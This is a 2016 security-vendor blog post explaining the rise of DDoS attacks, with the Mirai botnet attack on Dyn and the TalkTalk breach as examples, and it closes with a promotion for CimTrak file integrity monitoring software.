Reddit. Twitter. Netflix. Amazon.
These four sites aren't only some of the most popular web services worldwide. They're all organizations that have suffered downtime due to distributed denial of service (DDoS) attacks in recent weeks.
Wired's Kim Zetter defines DDoS as " an attack that overwhelms a system with data—most commonly a flood of simultaneous requests sent to a website to view its page." These attacks can result in extended periods of downtime for businesses, frustrated customers, and lost revenue. Perhaps most frighteningly, DDoS attacks don't always occur alone. In some cases, they may be used by cybercriminals to "smokescreen" another, more malicious attack with data theft. In this blog, you'll learn why DDoS is on the rise and how your organization can ensure your endpoints aren't used in an attack.
1. Mirai Dyn wasn't the Worst
On October 21, 2016, cloud-based Internet performance management provider Dyn was hit with a massive DDoS attack. The result was hours-long outages for some of the most popular websites and services, including Amazon, Netflix, Twitter, and Reddit.
According to a blog post published by Dyn, they were targeted by "a sophisticated, highly distributed attack involving 10s of millions of IP addresses." The same blog post, authored by Dyn Chief Strategy Officer Kyle York, also confirmed that Mirai malware was used to create a massive botnet.
While the attack is still under active investigation, it was likely made possible due to the rapidly-increasing number of IoT endpoints, such as security cameras, routers, printers, and other connected devices. By identifying devices with default or easily-cracked security credentials, the Mirai code was able to gain control of these endpoints and assemble a powerful botnet army.
While this recent Mirai attack was horrific, it's likely not the last DDoS attack of a similar scale. As IoT endpoints increase and many individual and business users fail to change security defaults, the possibility of future botnet DDoS attacks remains strong.
2. They're Relatively Easy to Launch
In the aftermath of the Dyn attack, a series of hacktivism groups and collectives claimed responsibility for the disaster. These claims remain unproven and, in some cases, are viewed with significant doubt by the security community.
However, research by security analysis firm Flashpoint concluded the attack most likely was not launched by a political or crime collective. The attack may have originated among a community of "script kiddies," which are defined as individuals who often lack sophisticated technical skills and may launch attacks for fun.
The evidence that points to the recent, large-scale DDoS attack as the work of amateurs speaks a scary truth. In terms of sophistication, DDoS is much simpler than many other security threats, such as advanced persistent threats (APTs).
3. Hacker Motivations Can Vary
While no one truly knows the motivation for the latest DDoS attack, the evidence would indicate that it was not financially or politically motivated. Unlike CryptoLocker scams, which are almost always financially motivated in nature, the reasons behind DDoS can vary widely.
Over the past several years, crime collectives have launched DDoS attacks for political or criminal extortion reasons, as well as personal conflict. In some cases, a DDoS attack may be used for revenge against an organization or public figure.
Unfortunately, there is no typical "target" for a DDoS attack due to the wide variety of possible motivations. All organizations need to exercise vigilance, regardless of where they fall in terms of political or social controversy.
4. The IoT is Enabling DDoS
Many DDoS attacks rely on a "botnet," a technical army of computers or other endpoints that have been infected with malware and are directed by a command-and-control center to execute a DDoS attack. As IoT adoption soars, the number of potential recruits for malware-directed botnet armies is also rapidly increasing.
In late 2015, Gartner analysts predicted that there would be 6.4 billion connected "things" in use in 2016 and that the number will soar to 25 billion by the year 2020. In both enterprise and personal use contexts, these "things" may have lax security that enables DDoS attacks.
In some cases, these security flaws are inherent. In many others, IT pros or personal users may fail to adjust security away from default user credentials, which can make these devices incredibly easy to crack and infect. Full compliance with PCI guidelines is certainly a smart baseline for avoiding allowing your devices to become part of a botnet army.
5. They Can "Smokescreen" Criminal Activity
In some of the scariest attacks on record, DDoS is used to obscure other criminal activities that occur simultaneously. While a security team rushes to restore web services to clients, criminals may take advantage of their distractions to gain entry to the network and protect data.
The Guardian stated in 2015 that UK-based telecom company TalkTalk was subject to a DDoS attack that was used to distract the firm's security team while hackers stole protected data. This attack wasn't unique in strategy and, in fact, could be an increasingly utilized tactic in the future.
6. They Actually Aren't Your Greatest Threat
The data is clear that the potential for DDoS attacks is on the rise based on the sheer number of unsecured endpoints and connected devices. However, that doesn't mean your organization's printers and routers will be recruited to a botnet army or that you must suffer a denial of web services while criminals steal your data.
Chances are, your organization can be targeted by code similar to Mirai, which attempts to load malware onto your connected devices. The smartest way to be prepared is through a combination of compliant device security and technical safeguards that enable network oversight.
Can File Integrity Monitoring Software Protect Against DDoS Attacks?
Real-time, agent-based file integrity monitoring software can be an important technical safeguard against DDoS, APT, and a host of other modern threats. By providing total oversight of your organization's network, you can discover vulnerabilities and compliance issues before they're exploited by cybercriminals.
It's not easy to defend against DDoS attacks—but it's possible with real-time file integrity monitoring software. With real-time oversight of your entire network, you can detect and reverse malware the moment it infects an endpoint. Your best defense to combat the growing threat of ransom-driven DDoS attacks is to use tools that can detect and reverse negative changes in real time so you can stay on top of all the threats to your network.
To learn more about CimTrak, download our technical summary today.
November 30, 2016